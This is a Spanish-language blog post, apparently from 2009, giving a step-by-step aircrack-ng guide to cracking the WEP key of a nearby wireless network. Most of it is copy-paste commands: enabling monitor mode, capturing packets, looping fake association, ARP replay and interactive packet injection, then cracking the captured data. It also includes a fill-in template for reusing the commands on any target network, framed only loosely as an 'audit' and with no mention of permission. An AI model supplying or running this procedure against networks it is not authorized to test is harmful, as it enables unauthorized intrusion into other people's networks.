lunes, 6 de abril de 2009

AIRCRACK-NG - Breve guía

Editado 05/12/2010
Previo:
-Crea un directorio (carpeta) en tu usuario que se llame "datos". (Es para recoger todos los datos y que no queden desperdigados por el directorio de nuestro usuario)
-Si quieres abrir pestañas en el terminal, pulsa a la vez Mayús+Ctrl+T
-Para copiar en la terminal, selecciona y pulsa Mayús+Ctrl+C
-Para pegar en la terminal, selecciona y pulsa Mayús+Ctrl+V
===============================================
Mis datos para esta auditoría:
    * Dirección MAC de mi tarjeta de red: 00:15:c4:69:0e:fc
    * BSSID (dirección MAC-DEL-ROUTER): 00:00:23:C6:F0:E8
    * ESSID (nombre de la red Wireless): WLAN93
    * Canal del ROUTER: 6
    * Interface Wireless: wlan0

===============================================
Abre una terminal.
-Para saber cuál es tu wifi y su MAC:
ifconfig
-Copia la wifi (wlan0) y su MAC (direcciónHW xx:xx:xx:xx:xx:xx). (Selecciona, Copia y Pega) Estos datos te valen para otras ocasiones.
==============================================
-Ver las redes que tenemos a nuestro alcance:
sudo iwlist wlan0 scan
-Elige la red a la que queremos acceder. Anota su MAC, canal y nombre. (Selecciona, Copia y Pega)
MAC-DEL-AP
Channel:6
NOMBREDELARED
==============================================
-Parar nuestra tarjeta:: Botón derecho sobre el Administrador (icono) de redes / Despicar "Activar red"
-Lanza airmon para poner la tarjeta en modo monitor.
sudo airmon-ng start wlan0
-Y mira como se llama ahora tu tarjeta: (Seguramente mon0)
-Mata todos los procesos que te indica que están abiertos:
sudo kill (nºs de procesos)
ejemplo:
sudo kill 451 489 790 1006
============================================
-Lanza airodump para que recoja las datas:
sudo airodump-ng -w /home/TU-USUARIO/datos/datas --bssid MAC-DEL-AP -c 6 mon0
Monitorear la red WLAN93; canal 6 y guardar los resultados en el archivo datas
(la bssid es la del router (AP WLAN93) en que queremos entrar)
sudo airodump-ng -w /home/TU-USUARIO/datos/datas --bssid 00:00:23:C6:F0:E8 -c 6 mon0
============================================
-Ahora lanzamos el ataque 1 para asociarnos con la red. (Es fundamental asociarse)
La orden viene preparada para que, en caso de caducar, se vuelva a repetir por sí sola.
while true; do sudo aireplay-ng -1 30 -e NOMBREDELARED -a MAC-DEL-ROUTER -h MAC-DE-TU-TARJETA mon0; done
Asociar nuestra tarjeta con el router (Insistir hasta que dé el mensaje "Association Successfull"
while true; do sudo aireplay-ng -1 30 -e WLAN93 -a 00:00:23:C6:F0:E8 -h 00:15:c4:69:0e:fc mon0; done
*(con el 30 se puede jugar y poner 0, 10, 15, 20, 25, 30)
============================================
-Simultáneamente lanzamos un ataque 3. Abrir otra consola para comenzar a leer y enviar paquetes y recibir arp y guardarlos
sudo aireplay-ng -3 -x600 -b MAC-DEL-ROUTER -h MAC-DE-NUESTRA-TARJETA mon0
sudo aireplay-ng -3 -x600 -b 00:00:23:C6:F0:E8 -h 00:15:c4:69:0e:fc mon0
*(con el 600 puedes jugar, hasta un máximo de 1024)
============================================
-El ataque 2 es, en principio, opcional. Unas veces funciona mejor con él y otras no. Hay que probar. Para usarlo hay que haber recogido algunas datas con airodump.
sudo aireplay-ng -2 -a MAC-DEL-ROUTER -h MAC-DE-NUESTRA-TARJETA -r /home/TU-USUARIO/datos/datas-01.cap mon0
sudo aireplay-ng -2 -a 00:00:23:C6:F0:E8 -h 00:15:c4:69:0e:fc -r /home/TU-USUARIO/datos/datas-01.cap mon0
============================================

**Si en la red hay ya otra STATION conectada al BSSID hacemos un ataque 3 directo:
sudo aireplay-ng -3 -x 1024 -b MAC-DEL-ROUTER -h MAC-DEL-CLIENTE-STATION mon0
============================================

Cuando hemos alcanzado un mínimo de 50.000 datas, lanzamos aircrack-ng
sudo aircrack-ng /home/TU-USUARIO/datos/*.cap

======================
======================
PLANTILLA PARA "BUSCAR Y REEMPLAZAR"
Cuando tienes los datos de: la_mac_de_tu_tarjeta, el_nombre_de_la_red y la_mac_del_ap; utiliza el botón de gedit "Buscar y Reemplazar" (El de la derecha del todo). Y sustituye los datos de MAC fácilmente.
Usa Copiar y Pegar.
*No olvides cambiar el canal: (En el ejemplo es el 6)

sudo airodump-ng -w /home/TU-USUARIO/datos/datas --bssid MAC-DEL-ROUTER -c 6 mon0

while true; do sudo aireplay-ng -1 30 -e NOMBREDELARED -a MAC-DEL-ROUTER -h MAC-DE-TU-TARJETA mon0; done

sudo aireplay-ng -3 -x50 -b MAC-DEL-ROUTER -h MAC-DE-TU-TARJETA mon0

sudo aireplay-ng -2 -a MAC-DEL-ROUTER -h MAC-DE-TU-TARJETA -r /home/TU-USUARIO/datos/datas-01.cap mon0

=============================

sudo aircrack-ng /home/TU-USUARIO/datos/*.cap

**Cuando cambies de red, BORRA todo los ficheros que tengas en el directorio "datos".
Documentación

===============
Instala y usa Aircrack-ptw
La ventaja de aircrack-ptw es que es capaz de desencriptar las claves con menos datos que aircrack-ng

Descargar desde Rapidshare:

Extraer y entrar al directorio: cd ~/Descargas/aircrack-ptw-1.0.0

sudo make clean && make

sudo cp aircrack-ptw /usr/bin/

Para lanzar:

sudo aircrack-ptw archivo.cap
sudo aircrack-ptw datas-01.cap

No hay comentarios: